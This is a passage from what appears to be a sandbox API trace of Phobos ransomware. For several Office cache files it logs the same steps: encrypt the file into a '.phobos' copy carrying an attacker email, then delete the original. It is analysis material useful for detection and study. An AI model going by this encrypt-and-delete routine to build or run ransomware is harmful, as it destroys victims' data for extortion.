pbBuffer=0x2a0fb68) returned 1 [0139.383] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.383] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=819) returned 1 [0139.383] CloseHandle (hObject=0x138) returned 1 [0139.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020 [0139.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.383] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.383] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.384] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.384] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.384] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.384] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.384] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x333, lpOverlapped=0x0) returned 1 [0139.421] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x340, dwBufLen=0x340 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x340) returned 1 [0139.421] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x340, lpOverlapped=0x0) returned 1 [0139.422] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32828) returned 1 [0139.422] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.422] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0139.422] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.422] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0139.422] CryptDestroyKey (hKey=0xa327e8) returned 1 [0139.422] CloseHandle (hObject=0x138) returned 1 [0139.422] CloseHandle (hObject=0x148) returned 1 [0139.423] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0139.424] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.424] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.425] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=27195) returned 1 [0139.425] CloseHandle (hObject=0x148) returned 1 [0139.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020 [0139.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.425] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.425] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.425] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.425] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.426] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.426] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.426] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6a3b, lpOverlapped=0x0) returned 1 [0139.490] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6a40, dwBufLen=0x6a40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6a40) returned 1 [0139.491] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6a40, lpOverlapped=0x0) returned 1 [0139.492] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32828) returned 1 [0139.492] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.492] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0139.492] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.492] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0139.492] CryptDestroyKey (hKey=0xa327e8) returned 1 [0139.492] CloseHandle (hObject=0x148) returned 1 [0139.492] CloseHandle (hObject=0x138) returned 1 [0139.493] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1 [0139.494] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.494] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.494] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67190) returned 1 [0139.494] CloseHandle (hObject=0x138) returned 1 [0139.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020 [0139.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.494] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.494] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.494] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.494] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.495] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.495] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10676, lpOverlapped=0x0) returned 1 [0139.529] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10680, dwBufLen=0x10680 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10680) returned 1 [0139.530] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10680, lpOverlapped=0x0) returned 1 [0139.533] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32828) returned 1 [0139.533] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.533] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0139.533] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.533] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0139.533] CryptDestroyKey (hKey=0xa327e8) returned 1 [0139.533] CloseHandle (hObject=0x138) returned 1 [0139.533] CloseHandle (hObject=0x148) returned 1 [0139.535] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1 [0139.536] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.536] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.536] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9352) returned 1 [0139.536] CloseHandle (hObject=0x148) returned 1 [0139.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0139.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.536] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.536] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.537] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.537] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.537] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.537] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.537] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2488, lpOverlapped=0x0) returned 1 [0139.643] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2490, dwBufLen=0x2490 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2490) returned 1 [0139.643] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2490, lpOverlapped=0x0) returned 1 [0139.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32828) returned 1 [0139.644] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.644] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0139.644] CryptDestroyKey (hKey=0xa32828) returned 1 [0139.644] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0139.644] CryptDestroyKey (hKey=0xa327e8) returned 1 [0139.644] CloseHandle (hObject=0x148) returned 1 [0139.644] CloseHandle (hObject=0x138) returned 1 [0139.645] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0139.646] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.648] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1349) returned 1 [0139.648] CloseHandle (hObject=0x138) returned 1 [0139.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020 [0139.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.648] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.648] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.648] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.648] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.649] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.649] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.649] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x545, lpOverlapped=0x0) returned 1 [0139.771] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x550, dwBufLen=0x550 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x550) returned 1 [0139.771] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x550, lpOverlapped=0x0) returned 1 [0139.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329a8) returned 1 [0139.772] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.772] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0139.772] CryptDestroyKey (hKey=0xa329a8) returned 1 [0139.772] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0139.772] CryptDestroyKey (hKey=0xa327e8) returned 1 [0139.772] CloseHandle (hObject=0x138) returned 1 [0139.772] CloseHandle (hObject=0x148) returned 1 [0139.774] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0139.775] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0139.775] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.775] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=596341) returned 1 [0139.775] CloseHandle (hObject=0x148) returned 1 [0139.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020 [0139.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0139.775] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0139.775] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: 